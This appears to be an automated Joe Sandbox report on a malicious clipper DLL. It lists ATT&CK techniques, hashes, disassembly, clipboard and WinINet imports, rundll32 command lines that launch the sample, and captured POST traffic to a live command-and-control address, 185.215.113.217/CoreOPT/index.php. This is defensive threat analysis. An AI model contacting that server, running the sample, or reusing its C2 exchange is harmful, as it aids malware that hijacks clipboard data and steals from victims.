Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB970A7 cpuid 7_2_6FB970A7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6FB973F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_6FB973F8
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
111
Process Injection
112
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
111
Process Injection
LSASS Memory121
Security Software Discovery
Remote Desktop Protocol2
Clipboard Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager112
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1542876 Sample: uLV6jN2BWh.dll Startdate: 26/10/2024 Architecture: WINDOWS Score: 56 23 Sample uses string decryption to hide its real strings 2->23 7 loaddll32.exe 1 2->7         started        process3 process4 9 rundll32.exe 12 7->9         started        12 rundll32.exe 7->12         started        14 rundll32.exe 12 7->14         started        17 5 other processes 7->17 dnsIp5 25 System process connects to network (likely due to code injection or exploit) 9->25 27 Found potential dummy code loops (likely to delay analysis) 12->27 21 185.215.113.217, 49704, 49705, 80 WHOLESALECONNECTIONSNL Portugal 14->21 19 rundll32.exe 17->19         started        signatures6 process7

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://185.215.113.217/CoreOPT/index.phptrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://185.215.113.217/CoreOPT/index.php/Jrundll32.exe, 00000007.00000002.4530891630.0000000000DB0000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://185.215.113.217/CoreOPT/index.phpVrundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://185.215.113.217/CoreOPT/index.phplrundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://185.215.113.217/rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://185.215.113.217/CoreOPT/index.php)rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://185.215.113.217/CoreOPT/index.php5Yrundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://185.215.113.217/CoreOPT/index.phpdYrundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://185.215.113.217/CoreOPT/index.php4rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.215.113.217/NF1drundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.217
                      unknownPortugal
                      206894WHOLESALECONNECTIONSNLtrue
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1542876
                      Start date and time:2024-10-26 19:12:51 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 38s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:13
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:uLV6jN2BWh.dll
                      renamed because original name is a hash value
                      Original Sample Name:9fcac34b8162651f29288e1ffff9394d.dll
                      Detection:MAL
                      Classification:mal56.evad.winDLL@18/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 8
                      • Number of non-executed functions: 28
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: uLV6jN2BWh.dll
                      TimeTypeDescription
                      13:13:52API Interceptor1x Sleep call for process: loaddll32.exe modified
                      13:14:23API Interceptor12186368x Sleep call for process: rundll32.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.217mU3Ob2XcCt.dllGet hashmaliciousAmadeyBrowse
                      • 185.215.113.217/CoreOPT/index.php?wal=1
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLmU3Ob2XcCt.dllGet hashmaliciousAmadeyBrowse
                      • 185.215.113.217
                      ZnPyVAOUBc.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                      • 185.215.113.217
                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                      • 185.215.113.206
                      No context
                      No context
                      No created / dropped files found
                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.356468550413769
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:uLV6jN2BWh.dll
                      File size:126'976 bytes
                      MD5:9fcac34b8162651f29288e1ffff9394d
                      SHA1:68f2eb355162fbe260c6f7256d2a13fa5e6227d0
                      SHA256:61e770436568881a68dc2c4db3e84f33a89f5d7068f5988582c133cbe7c9519c
                      SHA512:c571704b0c2c8f209538487bc63625ac62789efc27043c15cc9db3d30c6f783f5702e5b2a801dc42ce1406f394815df85f8e31357879d0a0365a5a6da41f9263
                      SSDEEP:3072:odUmIYSBYZuziT7Sgmu1ErYn/YoZ3SNq0l9ZidU1epo:TBY7yASgb1ErY3Z309odUwpo
                      TLSH:29C34B213496C031C65D567E18A8ABF487BD6914DFB04DE77B840E7B8E242C2EE34D7A
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P............................................................................@.......@.......@.~.....@.......Rich...........
                      Icon Hash:7ae282899bbab082
                      Entrypoint:0x10007062
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x10000000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x671CF638 [Sat Oct 26 14:01:28 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:fdb088ba51afbf555d7a0f495212d8f1
                      Instruction
                      push ebp
                      mov ebp, esp
                      cmp dword ptr [ebp+0Ch], 01h
                      jne 00007F33A0BC4917h
                      call 00007F33A0BC4CEAh
                      push dword ptr [ebp+10h]
                      push dword ptr [ebp+0Ch]
                      push dword ptr [ebp+08h]
                      call 00007F33A0BC47C3h
                      add esp, 0Ch
                      pop ebp
                      retn 000Ch
                      jmp 00007F33A0BC8632h
                      push ebp
                      mov ebp, esp
                      sub esp, 0Ch
                      lea ecx, dword ptr [ebp-0Ch]
                      call 00007F33A0BC3EC5h
                      push 1001C6A0h
                      lea eax, dword ptr [ebp-0Ch]
                      push eax
                      call 00007F33A0BC537Dh
                      int3
                      push ebp
                      mov ebp, esp
                      and dword ptr [1001F708h], 00000000h
                      sub esp, 24h
                      or dword ptr [1001E00Ch], 01h
                      push 0000000Ah
                      call dword ptr [10016050h]
                      test eax, eax
                      je 00007F33A0BC4ABFh
                      and dword ptr [ebp-10h], 00000000h
                      xor eax, eax
                      push ebx
                      push esi
                      push edi
                      xor ecx, ecx
                      lea edi, dword ptr [ebp-24h]
                      push ebx
                      cpuid
                      mov esi, ebx
                      pop ebx
                      mov dword ptr [edi], eax
                      mov dword ptr [edi+04h], esi
                      mov dword ptr [edi+08h], ecx
                      xor ecx, ecx
                      mov dword ptr [edi+0Ch], edx
                      mov eax, dword ptr [ebp-24h]
                      mov edi, dword ptr [ebp-1Ch]
                      mov dword ptr [ebp-0Ch], eax
                      xor edi, 6C65746Eh
                      mov eax, dword ptr [ebp-18h]
                      xor eax, 49656E69h
                      mov dword ptr [ebp-08h], eax
                      mov eax, dword ptr [ebp-20h]
                      xor eax, 756E6547h
                      mov dword ptr [ebp-04h], eax
                      xor eax, eax
                      inc eax
                      push ebx
                      cpuid
                      mov esi, ebx
                      pop ebx
                      lea ebx, dword ptr [ebp-24h]
                      mov dword ptr [ebx], eax
                      mov eax, dword ptr [ebp-04h]
                      mov dword ptr [ebx+04h], esi
                      or eax, edi
                      or eax, dword ptr [ebp-08h]
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1ccd00x9c.rdata
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1cd6c0x50.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x200000xf8.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x210000x1af8.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1bb440x38.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1bb800x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x160000x14c.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x143060x14400ec6930cef6de108017a4ccb80ee1920eFalse0.5099223572530864data6.542510204253566IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x160000x74ea0x760030940b68ded5193f2114448cb8d0c6bcFalse0.4288268008474576data5.152147630733541IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x1e0000x1fec0x1400070ceab71158e4b98b9fbb2974a658d3False0.094140625data1.5445177251659354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x200000xf80x2009f59a1f7f3b6dfefbfe8605086b5888eFalse0.333984375data2.5080557656497993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x210000x1af80x1c0008f7780a782a129fa8fb316247ea649cFalse0.75390625data6.517798709045728IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_MANIFEST0x200600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793
                      DLLImport
                      KERNEL32.dllGlobalAlloc, GlobalLock, GlobalUnlock, WideCharToMultiByte, Sleep, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, DecodePointer
                      USER32.dllEmptyClipboard, SetClipboardData, CloseClipboard, GetClipboardData, OpenClipboard
                      WININET.dllInternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle
                      NameOrdinalAddress
                      ??4CClipperDLL@@QAEAAV0@$$QAV0@@Z10x10001d60
                      ??4CClipperDLL@@QAEAAV0@ABV0@@Z20x10001d60
                      Main30x100059a0
                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 26, 2024 19:13:50.847470999 CEST4970480192.168.2.5185.215.113.217
                      Oct 26, 2024 19:13:50.853457928 CEST8049704185.215.113.217192.168.2.5
                      Oct 26, 2024 19:13:50.853535891 CEST4970480192.168.2.5185.215.113.217
                      Oct 26, 2024 19:13:50.853724003 CEST4970480192.168.2.5185.215.113.217
                      Oct 26, 2024 19:13:50.859653950 CEST8049704185.215.113.217192.168.2.5
                      Oct 26, 2024 19:13:51.898665905 CEST8049704185.215.113.217192.168.2.5
                      Oct 26, 2024 19:13:51.898730040 CEST4970480192.168.2.5185.215.113.217
                      Oct 26, 2024 19:13:53.891271114 CEST4970580192.168.2.5185.215.113.217
                      Oct 26, 2024 19:13:53.897099018 CEST8049705185.215.113.217192.168.2.5
                      Oct 26, 2024 19:13:53.897316933 CEST4970580192.168.2.5185.215.113.217
                      Oct 26, 2024 19:13:53.897411108 CEST4970580192.168.2.5185.215.113.217
                      Oct 26, 2024 19:13:53.903260946 CEST8049705185.215.113.217192.168.2.5
                      Oct 26, 2024 19:13:54.925247908 CEST8049705185.215.113.217192.168.2.5
                      Oct 26, 2024 19:13:54.925414085 CEST4970580192.168.2.5185.215.113.217
                      Oct 26, 2024 19:15:07.517287970 CEST8049704185.215.113.217192.168.2.5
                      Oct 26, 2024 19:15:07.517404079 CEST8049704185.215.113.217192.168.2.5
                      Oct 26, 2024 19:15:07.517537117 CEST8049704185.215.113.217192.168.2.5
                      Oct 26, 2024 19:15:07.517611027 CEST4970480192.168.2.5185.215.113.217
                      Oct 26, 2024 19:15:07.517611027 CEST4970480192.168.2.5185.215.113.217
                      Oct 26, 2024 19:15:10.089392900 CEST8049705185.215.113.217192.168.2.5
                      Oct 26, 2024 19:15:10.089471102 CEST4970580192.168.2.5185.215.113.217
                      Oct 26, 2024 19:15:40.781274080 CEST4970480192.168.2.5185.215.113.217
                      Oct 26, 2024 19:15:40.786643028 CEST8049704185.215.113.217192.168.2.5
                      Oct 26, 2024 19:15:43.842576027 CEST4970580192.168.2.5185.215.113.217
                      Oct 26, 2024 19:15:43.848074913 CEST8049705185.215.113.217192.168.2.5
                      • 185.215.113.217
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549704185.215.113.217806616C:\Windows\SysWOW64\rundll32.exe
                      TimestampBytes transferredDirectionData
                      Oct 26, 2024 19:13:50.853724003 CEST157OUTPOST /CoreOPT/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.217
                      Content-Length: 5
                      Cache-Control: no-cache
                      Data Raw: 77 6c 74 3d 31
                      Data Ascii: wlt=1
                      Oct 26, 2024 19:13:51.898665905 CEST719INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 26 Oct 2024 17:13:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 39 64 33 66 64 38 30 32 35 63 32 34 64 36 34 66 37 36 62 64 39 32 66 61 62 66 64 37 36 61 66 61 39 37 33 65 31 36 62 38 66 31 32 36 36 63 35 33 38 39 64 61 62 33 30 33 30 34 65 30 36 36 61 35 31 30 32 33 30 62 38 66 30 34 65 33 65 31 33 31 64 31 35 63 2d 31 2d 5f 32 5f 63 66 32 34 38 64 34 37 30 64 30 35 38 33 34 38 36 32 66 61 63 33 66 35 62 63 39 65 33 61 66 62 61 65 36 66 35 36 66 64 61 63 31 30 33 38 37 35 64 63 65 39 66 31 34 37 35 62 39 61 32 61 65 36 32 37 37 62 35 36 63 66 35 62 65 31 66 37 33 65 38 61 35 30 2d 32 2d 5f 33 5f 62 33 30 65 38 65 34 62 31 62 37 32 38 39 35 65 36 30 66 63 62 33 38 31 62 39 65 36 34 61 62 64 61 36 33 64 31 39 62 38 66 38 33 31 33 61 35 31 38 39 64 64 61 38 32 33 31 34 38 66 34 61 65 36 30 30 32 39 2d 33 2d 5f 34 5f 62 62 30 65 61 66 31 32 32 30 30 37 63 61 34 32 37 34 39 38 63 36 62 35 65 32 66 32 37 64 38 61 38 63 30 64 33 32 38 64 64 38 31 32 36 65 30 32 62 64 66 31 62 66 32 36 32 64 38 66 34 34 62 36 31 34 33 33 2d 34 2d 5f [TRUNCATED]
                      Data Ascii: 210 +++_1_9d3fd8025c24d64f76bd92fabfd76afa973e16b8f1266c5389dab30304e066a510230b8f04e3e131d15c-1-_2_cf248d470d05834862fac3f5bc9e3afbae6f56fdac103875dce9f1475b9a2ae6277b56cf5be1f73e8a50-2-_3_b30e8e4b1b72895e60fcb381b9e64abda63d19b8f8313a5189dda823148f4ae60029-3-_4_bb0eaf122007ca427498c6b5e2f27d8a8c0d328dd8126e02bdf1bf262d8f44b61433-4-_5_cb6ad144382aee4a478bc2f9eff033be851a259cf334425adcf9bf27598f6d9a0e270fbd2ee7a049ae3f156d8f4f285c56a998072a6d6ea1e95d2391e7e2c8ccafb8cc53d94db10c005f7143e92dd5382db4027f701de48ff439232175095e-5-0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.549705185.215.113.217805688C:\Windows\SysWOW64\rundll32.exe
                      TimestampBytes transferredDirectionData
                      Oct 26, 2024 19:13:53.897411108 CEST157OUTPOST /CoreOPT/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.217
                      Content-Length: 5
                      Cache-Control: no-cache
                      Data Raw: 77 6c 74 3d 31
                      Data Ascii: wlt=1
                      Oct 26, 2024 19:13:54.925247908 CEST719INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 26 Oct 2024 17:13:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 39 64 33 66 64 38 30 32 35 63 32 34 64 36 34 66 37 36 62 64 39 32 66 61 62 66 64 37 36 61 66 61 39 37 33 65 31 36 62 38 66 31 32 36 36 63 35 33 38 39 64 61 62 33 30 33 30 34 65 30 36 36 61 35 31 30 32 33 30 62 38 66 30 34 65 33 65 31 33 31 64 31 35 63 2d 31 2d 5f 32 5f 63 66 32 34 38 64 34 37 30 64 30 35 38 33 34 38 36 32 66 61 63 33 66 35 62 63 39 65 33 61 66 62 61 65 36 66 35 36 66 64 61 63 31 30 33 38 37 35 64 63 65 39 66 31 34 37 35 62 39 61 32 61 65 36 32 37 37 62 35 36 63 66 35 62 65 31 66 37 33 65 38 61 35 30 2d 32 2d 5f 33 5f 62 33 30 65 38 65 34 62 31 62 37 32 38 39 35 65 36 30 66 63 62 33 38 31 62 39 65 36 34 61 62 64 61 36 33 64 31 39 62 38 66 38 33 31 33 61 35 31 38 39 64 64 61 38 32 33 31 34 38 66 34 61 65 36 30 30 32 39 2d 33 2d 5f 34 5f 62 62 30 65 61 66 31 32 32 30 30 37 63 61 34 32 37 34 39 38 63 36 62 35 65 32 66 32 37 64 38 61 38 63 30 64 33 32 38 64 64 38 31 32 36 65 30 32 62 64 66 31 62 66 32 36 32 64 38 66 34 34 62 36 31 34 33 33 2d 34 2d 5f [TRUNCATED]
                      Data Ascii: 210 +++_1_9d3fd8025c24d64f76bd92fabfd76afa973e16b8f1266c5389dab30304e066a510230b8f04e3e131d15c-1-_2_cf248d470d05834862fac3f5bc9e3afbae6f56fdac103875dce9f1475b9a2ae6277b56cf5be1f73e8a50-2-_3_b30e8e4b1b72895e60fcb381b9e64abda63d19b8f8313a5189dda823148f4ae60029-3-_4_bb0eaf122007ca427498c6b5e2f27d8a8c0d328dd8126e02bdf1bf262d8f44b61433-4-_5_cb6ad144382aee4a478bc2f9eff033be851a259cf334425adcf9bf27598f6d9a0e270fbd2ee7a049ae3f156d8f4f285c56a998072a6d6ea1e95d2391e7e2c8ccafb8cc53d94db10c005f7143e92dd5382db4027f701de48ff439232175095e-5-0


                      Click to jump to process

                      Click to jump to process

                      Click to jump to process

                      Target ID:0
                      Start time:13:13:43
                      Start date:26/10/2024
                      Path:C:\Windows\System32\loaddll32.exe
                      Wow64 process (32bit):true
                      Commandline:loaddll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll"
                      Imagebase:0x9b0000
                      File size:126'464 bytes
                      MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:1
                      Start time:13:13:43
                      Start date:26/10/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:2
                      Start time:13:13:43
                      Start date:26/10/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:13:13:43
                      Start date:26/10/2024
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
                      Imagebase:0xf90000
                      File size:61'440 bytes
                      MD5 hash:889B99C52A60DD49227C5E485A016679
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:13:13:43
                      Start date:26/10/2024
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
                      Imagebase:0xf90000
                      File size:61'440 bytes
                      MD5 hash:889B99C52A60DD49227C5E485A016679
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:6
                      Start time:13:13:46
                      Start date:26/10/2024
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
                      Imagebase:0xf90000
                      File size:61'440 bytes
                      MD5 hash:889B99C52A60DD49227C5E485A016679
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:7
                      Start time:13:13:49
                      Start date:26/10/2024
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main
                      Imagebase:0xf90000
                      File size:61'440 bytes
                      MD5 hash:889B99C52A60DD49227C5E485A016679
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:8
                      Start time:13:13:52
                      Start date:26/10/2024
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
                      Imagebase:0xf90000
                      File size:61'440 bytes
                      MD5 hash:889B99C52A60DD49227C5E485A016679
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:13:13:52
                      Start date:26/10/2024
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
                      Imagebase:0xf90000
                      File size:61'440 bytes
                      MD5 hash:889B99C52A60DD49227C5E485A016679
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:10
                      Start time:13:13:52
                      Start date:26/10/2024
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main
                      Imagebase:0xf90000
                      File size:61'440 bytes
                      MD5 hash:889B99C52A60DD49227C5E485A016679
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Reset < >

                        Execution Graph

                        Execution Coverage:3.3%
                        Dynamic/Decrypted Code Coverage:0%
